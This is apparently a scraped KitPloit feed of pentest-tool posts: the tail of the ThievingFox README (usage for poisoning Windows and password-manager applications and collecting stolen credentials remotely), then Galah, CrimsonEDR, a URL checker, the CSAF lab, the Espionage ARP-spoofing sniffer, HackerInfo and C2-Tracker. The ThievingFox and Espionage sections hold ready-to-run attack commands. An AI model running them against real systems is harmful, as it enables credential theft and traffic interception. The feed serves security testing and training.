    --mstsc Try to poison mstsc.exe
    --mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
    logged in (Default: False)
    --consent Try to poison Consent.exe
    --logonui Try to poison LogonUI.exe
    --rdcman Try to poison RDCMan.exe
    --rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
    logged in (Default: False)
    --mobaxterm Try to poison MobaXTerm.exe
    --mobaxterm-poison-hkcr
    Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
    logged in (Default: False)
    --all Try to poison all applications

    Cleanup

    For each application specified in the command line parameters, the cleanup first removes poisonning artifacts that force the target application to load the hooking library. Then, it tries to delete the library that were uploaded to the remote host.

    For applications that support poisonning of both HKCU and HKCR hives, both are cleaned up regardless.

    Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications.

    It does not clean extracted credentials on the remote host.

    [!IMPORTANT] If the targeted application is in use while the cleanup module is ran, the DLL that are dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.

    $ python3 client/ThievingFox.py cleanup -h
    usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
    [--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
    [--rdcman] [--mobaxterm] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and cons ent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of the domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Try to cleanup all poisonning artifacts related to KeePass.exe
    --keepass-share KEEPASS_SHARE
    The share on which KeePass is installed (Default: c$)
    --keepass-path KEEPASS_PATH
    The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
    --keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
    --keepassxc-path KEEPASSXC_PATH
    The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
    --keepassxc-share KEEPASSXC_SHARE
    The share on which KeePassXC is installed (Default: c$)
    --mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
    --consent Try to cleanup all poisonning artifacts related to Consent.exe
    --logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
    --rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
    --mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
    --all Try to cleanup all poisonning artifacts related to all applications

    Collect

    For each application specified on the command line parameters, the collect module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir> corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/ouput/.

    Multiple applications can be specified at once, or, the --all flag can be used to collect logs from all applications.

    $ python3 client/ThievingFox.py collect -h
    usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
    [--logonui] [--rdcman] [--mobaxterm] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of th e domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Collect KeePass.exe logs
    --keepassxc Collect KeePassXC.exe logs
    --mstsc Collect mstsc.exe logs
    --consent Collect Consent.exe logs
    --logonui Collect LogonUI.exe logs
    --rdcman Collect RDCMan.exe logs
    --mobaxterm Collect MobaXTerm.exe logs
    --all Collect logs from all applications


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Galah - An LLM-powered Web Honeypot Using The OpenAI API

    By: Zion3R β€” April 29th 2024 at 12:30


    TL;DR: Galah (/Ι‘Ι™Λˆlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


    Description

    Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

    I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.

    The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

    Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

    Future Enhancements

    • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

    • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

    • Support for Other LLMs.

    Getting Started

    • Ensure you have Go version 1.20+ installed.
    • Create an OpenAI API key from here.
    • If you want to serve over HTTPS, generate TLS certificates.
    • Clone the repo and install the dependencies.
    • Update the config.yaml file.
    • Build and run the Go binary!
    % git clone git@github.com:0x4D31/galah.git
    % cd galah
    % go mod download
    % go build
    % ./galah -i en0 -v

    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    β–ˆβ–ˆ β–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ
    β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    llm-based web honeypot // version 1.0
    author: Adel "0x4D31" Karimi

    2024/01/01 04:29:10 Starting HTTP server on port 8080
    2024/01/01 04:29:10 Starting HTTP server on port 8888
    2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
    2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

    2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
    2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
    2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
    2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

    ^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
    2024/01/01 04:39:27 All servers shut down gracefully.

    Example Responses

    Here are some example responses:

    Example 1

    % curl http://localhost:8080/login.php
    <!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

    JSON log record:

    {"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

    Example 2

    % curl http://localhost:8080/.aws/credentials
    [default]
    aws_access_key_id = AKIAIOSFODNN7EXAMPLE
    aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
    region = us-west-2

    JSON log record:

    {"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

    Okay, that was impressive!

    Example 3

    Now, let's do some sort of adversarial testing!

    % curl http://localhost:8888/are-you-a-honeypot
    No, I am a server.`

    JSON log record:

    {"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

    πŸ˜‘

    % curl http://localhost:8888/i-mean-are-you-a-fake-server`
    No, I am not a fake server.

    JSON log record:

    {"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

    You're a galah, mate!



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    CrimsonEDR - Simulate The Behavior Of AV/EDR For Malware Development Training

    By: Zion3R β€” April 28th 2024 at 12:30


    CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.


    Features

    Detection Description
    Direct Syscall Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks.
    NTDLL Unhooking Identifies attempts to unhook functions within the NTDLL library, a common evasion technique.
    AMSI Patch Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis.
    ETW Patch Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection.
    PE Stomping Identifies instances of PE (Portable Executable) stomping.
    Reflective PE Loading Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis.
    Unbacked Thread Origin Identifies threads originating from unbacked memory regions, often indicative of malicious activity.
    Unbacked Thread Start Address Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection.
    API hooking Places a hook on the NtWriteVirtualMemory function to monitor memory modifications.
    Custom Pattern Search Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures.

    Installation

    To get started with CrimsonEDR, follow these steps:

    1. Install dependancy: bash sudo apt-get install gcc-mingw-w64-x86-64
    2. Clone the repository: bash git clone https://github.com/Helixo32/CrimsonEDR
    3. Compile the project: bash cd CrimsonEDR; chmod +x compile.sh; ./compile.sh

    ⚠️ Warning

    Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.

    Usage

    To use CrimsonEDR, follow these steps:

    1. Make sure the ioc.json file is placed in the current directory from which the executable being monitored is launched. For example, if you launch your executable to monitor from C:\Users\admin\, the DLL will look for ioc.json in C:\Users\admin\ioc.json. Currently, ioc.json contains patterns related to msfvenom. You can easily add your own in the following format:
    {
    "IOC": [
    ["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
    ["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
    ["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
    ["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
    ["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
    ["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
    ["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
    ["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
    ]
    }
    1. Execute CrimsonEDRPanel.exe with the following arguments:

      • -d <path_to_dll>: Specifies the path to the CrimsonEDR.dll file.

      • -p <process_id>: Specifies the Process ID (PID) of the target process where you want to inject the DLL.

    For example:

    .\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

    Useful Links

    Here are some useful resources that helped in the development of this project:

    Contact

    For questions, feedback, or support, please reach out to me via:



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Url-Status-Checker - Tool For Swiftly Checking The Status Of URLs

    By: Zion3R β€” April 27th 2024 at 16:55



    Status Checker is a Python script that checks the status of one or multiple URLs/domains and categorizes them based on their HTTP status codes. Version 1.0.0 Created BY BLACK-SCORP10 t.me/BLACK-SCORP10

    Features

    • Check the status of single or multiple URLs/domains.
    • Asynchronous HTTP requests for improved performance.
    • Color-coded output for better visualization of status codes.
    • Progress bar when checking multiple URLs.
    • Save results to an output file.
    • Error handling for inaccessible URLs and invalid responses.
    • Command-line interface for easy usage.

    Installation

    1. Clone the repository:

    bash git clone https://github.com/your_username/status-checker.git cd status-checker

    1. Install dependencies:

    bash pip install -r requirements.txt

    Usage

    python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
    • -d, --domain: Single domain/URL to check.
    • -l, --list: File containing a list of domains/URLs to check.
    • -o, --output: File to save the output.
    • -v, --version: Display version information.
    • -update: Update the tool.

    Example:

    python status_checker.py -l urls.txt -o results.txt

    Preview:

    License

    This project is licensed under the MIT License - see the LICENSE file for details.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    CSAF - Cyber Security Awareness Framework

    By: Zion3R β€” April 26th 2024 at 12:30

    The Cyber Security Awareness Framework (CSAF) is a structured approach aimed at enhancing Cybersecurity" title="Cybersecurity">cybersecurity awareness and understanding among individuals, organizations, and communities. It provides guidance for the development of effective Cybersecurity" title="Cybersecurity">cybersecurity awareness programs, covering key areas such as assessing awareness needs, creating educational m aterials, conducting training and simulations, implementing communication campaigns, and measuring awareness levels. By adopting this framework, organizations can foster a robust security culture, enhance their ability to detect and respond to cyber threats, and mitigate the risks associated with attacks and security breaches.


    Requirements

    Software

    • Docker
    • Docker-compose

    Hardware

    Minimum

    • 4 Core CPU
    • 10GB RAM
    • 60GB Disk free

    Recommendation

    • 8 Core CPU or above
    • 16GB RAM or above
    • 100GB Disk free or above

    Installation

    Clone the repository

    git clone https://github.com/csalab-id/csaf.git

    Navigate to the project directory

    cd csaf

    Pull the Docker images

    docker-compose --profile=all pull

    Generate wazuh ssl certificate

    docker-compose -f generate-indexer-certs.yml run --rm generator

    For security reason you should set env like this first

    export ATTACK_PASS=ChangeMePlease
    export DEFENSE_PASS=ChangeMePlease
    export MONITOR_PASS=ChangeMePlease
    export SPLUNK_PASS=ChangeMePlease
    export GOPHISH_PASS=ChangeMePlease
    export MAIL_PASS=ChangeMePlease
    export PURPLEOPS_PASS=ChangeMePlease

    Start all the containers

    docker-compose --profile=all up -d

    You can run specific profiles for running specific labs with the following profiles - all - attackdefenselab - phisinglab - breachlab - soclab

    For example

    docker-compose --profile=attackdefenselab up -d

    Proof



    Exposed Ports

    An exposed port can be accessed using a proxy socks5 client, SSH client, or HTTP client. Choose one for the best experience.

    • Port 6080 (Access to attack network)
    • Port 7080 (Access to defense network)
    • Port 8080 (Access to monitor network)

    Example usage

    Access internal network with proxy socks5

    • curl --proxy socks5://ipaddress:6080 http://10.0.0.100/vnc.html
    • curl --proxy socks5://ipaddress:7080 http://10.0.1.101/vnc.html
    • curl --proxy socks5://ipaddress:8080 http://10.0.3.102/vnc.html

    Remote ssh with ssh client

    • ssh kali@ipaddress -p 6080 (default password: attackpassword)
    • ssh kali@ipaddress -p 7080 (default password: defensepassword)
    • ssh kali@ipaddress -p 8080 (default password: monitorpassword)

    Access kali linux desktop with curl / browser

    • curl http://ipaddress:6080/vnc.html
    • curl http://ipaddress:7080/vnc.html
    • curl http://ipaddress:8080/vnc.html

    Domain Access

    • http://attack.lab/vnc.html (default password: attackpassword)
    • http://defense.lab/vnc.html (default password: defensepassword)
    • http://monitor.lab/vnc.html (default password: monitorpassword)
    • https://gophish.lab:3333/ (default username: admin, default password: gophishpassword)
    • https://server.lab/ (default username: postmaster@server.lab, default passowrd: mailpassword)
    • https://server.lab/iredadmin/ (default username: postmaster@server.lab, default passowrd: mailpassword)
    • https://mail.server.lab/ (default username: postmaster@server.lab, default passowrd: mailpassword)
    • https://mail.server.lab/iredadmin/ (default username: postmaster@server.lab, default passowrd: mailpassword)
    • http://phising.lab/
    • http://10.0.0.200:8081/
    • http://gitea.lab/ (default username: csalab, default password: giteapassword)
    • http://dvwa.lab/ (default username: admin, default passowrd: password)
    • http://dvwa-monitor.lab/ (default username: admin, default passowrd: password)
    • http://dvwa-modsecurity.lab/ (default username: admin, default passowrd: password)
    • http://wackopicko.lab/
    • http://juiceshop.lab/
    • https://wazuh-indexer.lab:9200/ (default username: admin, default passowrd: SecretPassword)
    • https://wazuh-manager.lab/
    • https://wazuh-dashboard.lab:5601/ (default username: admin, default passowrd: SecretPassword)
    • http://splunk.lab/ (default username: admin, default password: splunkpassword)
    • https://infectionmonkey.lab:5000/
    • http://purpleops.lab/ (default username: admin@purpleops.com, default password: purpleopspassword)
    • http://caldera.lab/ (default username: red/blue, default password: calderapassword)

    Network / IP Address

    Attack

    • 10.0.0.100 attack.lab
    • 10.0.0.200 phising.lab
    • 10.0.0.201 server.lab
    • 10.0.0.201 mail.server.lab
    • 10.0.0.202 gophish.lab
    • 10.0.0.110 infectionmonkey.lab
    • 10.0.0.111 mongodb.lab
    • 10.0.0.112 purpleops.lab
    • 10.0.0.113 caldera.lab

    Defense

    • 10.0.1.101 defense.lab
    • 10.0.1.10 dvwa.lab
    • 10.0.1.13 wackopicko.lab
    • 10.0.1.14 juiceshop.lab
    • 10.0.1.20 gitea.lab
    • 10.0.1.110 infectionmonkey.lab
    • 10.0.1.112 purpleops.lab
    • 10.0.1.113 caldera.lab

    Monitor

    • 10.0.3.201 server.lab
    • 10.0.3.201 mail.server.lab
    • 10.0.3.9 mariadb.lab
    • 10.0.3.10 dvwa.lab
    • 10.0.3.11 dvwa-monitor.lab
    • 10.0.3.12 dvwa-modsecurity.lab
    • 10.0.3.102 monitor.lab
    • 10.0.3.30 wazuh-manager.lab
    • 10.0.3.31 wazuh-indexer.lab
    • 10.0.3.32 wazuh-dashboard.lab
    • 10.0.3.40 splunk.lab

    Public

    • 10.0.2.101 defense.lab
    • 10.0.2.13 wackopicko.lab

    Internet

    • 10.0.4.102 monitor.lab
    • 10.0.4.30 wazuh-manager.lab
    • 10.0.4.32 wazuh-dashboard.lab
    • 10.0.4.40 splunk.lab

    Internal

    • 10.0.5.100 attack.lab
    • 10.0.5.12 dvwa-modsecurity.lab
    • 10.0.5.13 wackopicko.lab

    License

    This Docker Compose application is released under the MIT License. See the LICENSE file for details.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Espionage - A Linux Packet Sniffing Suite For Automated MiTM Attacks

    By: Zion3R β€” April 25th 2024 at 12:30

    Espionage is a network packet sniffer that intercepts large amounts of data being passed through an interface. The tool allows users to to run normal and verbose traffic analysis that shows a live feed of traffic, revealing packet direction, protocols, flags, etc. Espionage can also spoof ARP so, all data sent by the target gets redirected through the attacker (MiTM). Espionage supports IPv4, TCP/UDP, ICMP, and HTTP. Espionag e was written in Python 3.8 but it also supports version 3.6. This is the first version of the tool so please contact the developer if you want to help contribute and add more to Espionage. Note: This is not a Scapy wrapper, scapylib only assists with HTTP requests and ARP.


    Installation

    1: git clone https://www.github.com/josh0xA/Espionage.git
    2: cd Espionage
    3: sudo python3 -m pip install -r requirments.txt
    4: sudo python3 espionage.py --help

    Usage

    1. sudo python3 espionage.py --normal --iface wlan0 -f capture_output.pcap
      Command 1 will execute a clean packet sniff and save the output to the pcap file provided. Replace wlan0 with whatever your network interface is.
    2. sudo python3 espionage.py --verbose --iface wlan0 -f capture_output.pcap
      Command 2 will execute a more detailed (verbose) packet sniff and save the output to the pcap file provided.
    3. sudo python3 espionage.py --normal --iface wlan0
      Command 3 will still execute a clean packet sniff however, it will not save the data to a pcap file. Saving the sniff is recommended.
    4. sudo python3 espionage.py --verbose --httpraw --iface wlan0
      Command 4 will execute a verbose packet sniff and will also show raw http/tcp packet data in bytes.
    5. sudo python3 espionage.py --target <target-ip-address> --iface wlan0
      Command 5 will ARP spoof the target ip address and all data being sent will be routed back to the attackers machine (you/localhost).
    6. sudo python3 espionage.py --iface wlan0 --onlyhttp
      Command 6 will only display sniffed packets on port 80 utilizing the HTTP protocol.
    7. sudo python3 espionage.py --iface wlan0 --onlyhttpsecure
      Command 7 will only display sniffed packets on port 443 utilizing the HTTPS (secured) protocol.
    8. sudo python3 espionage.py --iface wlan0 --urlonly
      Command 8 will only sniff and return sniffed urls visited by the victum. (works best with sslstrip).

    9. Press Ctrl+C in-order to stop the packet interception and write the output to file.

    Menu

    usage: espionage.py [-h] [--version] [-n] [-v] [-url] [-o] [-ohs] [-hr] [-f FILENAME] -i IFACE
    [-t TARGET]

    optional arguments:
    -h, --help show this help message and exit
    --version returns the packet sniffers version.
    -n, --normal executes a cleaner interception, less sophisticated.
    -v, --verbose (recommended) executes a more in-depth packet interception/sniff.
    -url, --urlonly only sniffs visited urls using http/https.
    -o, --onlyhttp sniffs only tcp/http data, returns urls visited.
    -ohs, --onlyhttpsecure
    sniffs only https data, (port 443).
    -hr, --httpraw displays raw packet data (byte order) recieved or sent on port 80.

    (Recommended) arguments for data output (.pcap):
    -f FILENAME, --filename FILENAME
    name of file to store the output (make extension '.pcap').

    (Required) arguments required for execution:
    -i IFACE, --iface IFACE
    specify network interface (ie. wlan0, eth0, wlan1, etc.)

    (ARP Spoofing) required arguments in-order to use the ARP Spoofing utility:
    -t TARGET, --target TARGET

    A Linux Packet Sniffing Suite for Automated MiTM Attacks (6)

    Writeup

    A simple medium writeup can be found here:
    Click Here For The Official Medium Article

    Ethical Notice

    The developer of this program, Josh Schiavone, written the following code for educational and ethical purposes only. The data sniffed/intercepted is not to be used for malicous intent. Josh Schiavone is not responsible or liable for misuse of this penetration testing tool. May God bless you all.

    License

    MIT License
    Copyright (c) 2024 Josh Schiavone




    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    HackerInfo - Infromations Web Application Security

    By: Zion3R β€” April 24th 2024 at 12:30




    Infromations Web Application Security


    install :

    sudo apt install python3 python3-pip

    pip3 install termcolor

    pip3 install google

    pip3 install optioncomplete

    pip3 install bs4


    pip3 install prettytable

    git clone https://github.com/Matrix07ksa/HackerInfo/

    cd HackerInfo

    chmod +x HackerInfo

    ./HackerInfo -h



    python3 HackerInfo.py -d www.facebook.com -f pdf
    [+] <-- Running Domain_filter_File ....-->
    [+] <-- Searching [www.facebook.com] Files [pdf] ....-->
    https://www.facebook.com/gms_hub/share/dcvsda_wf.pdf
    https://www.facebook.com/gms_hub/share/facebook_groups_for_pages.pdf
    https://www.facebook.com/gms_hub/share/videorequirementschart.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_hi_in.pdf
    https://www.facebook.com/gms_hub/share/bidding-strategy_decision-tree_en_us.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_es_la.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ar.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ur_pk.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_cs_cz.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_it_it.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pl_pl.pdf
    h ttps://www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pt_br.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_id_id.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_fr_fr.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_tr_tr.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_hi_in.pdf
    https://www.facebook.com/rsrc.php/yA/r/AVye1Rrg376.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_ur_pk.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_nl_nl.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_de_de.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_de_de.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_cs_cz.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_sk_sk.pdf
    https://www.facebook.com/gms _hub/share/creative-best-practices_japanese_jp.pdf
    #####################[Finshid]########################

    Usage:

    Hackerinfo infromations Web Application Security (11)

    Library install hackinfo:

    sudo python setup.py install
    pip3 install hackinfo



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    C2-Tracker - Live Feed Of C2 Servers, Tools, And Botnets

    By: Zion3R β€” April 24th 2024 at 02:23


    Free to use IOC feed for various tools/malware. It started out for just C2 tools but has morphed into tracking infostealers and botnets as well. It uses shodan.io/">Shodan searches to collect the IPs. The most recent collection is always stored in data; the IPs are broken down by tool and there is an all.txt.

    The feed should update daily. Actively working on making the backend more reliable


    Honorable Mentions

    Many of the Shodan queries have been sourced from other CTI researchers:

    Huge shoutout to them!

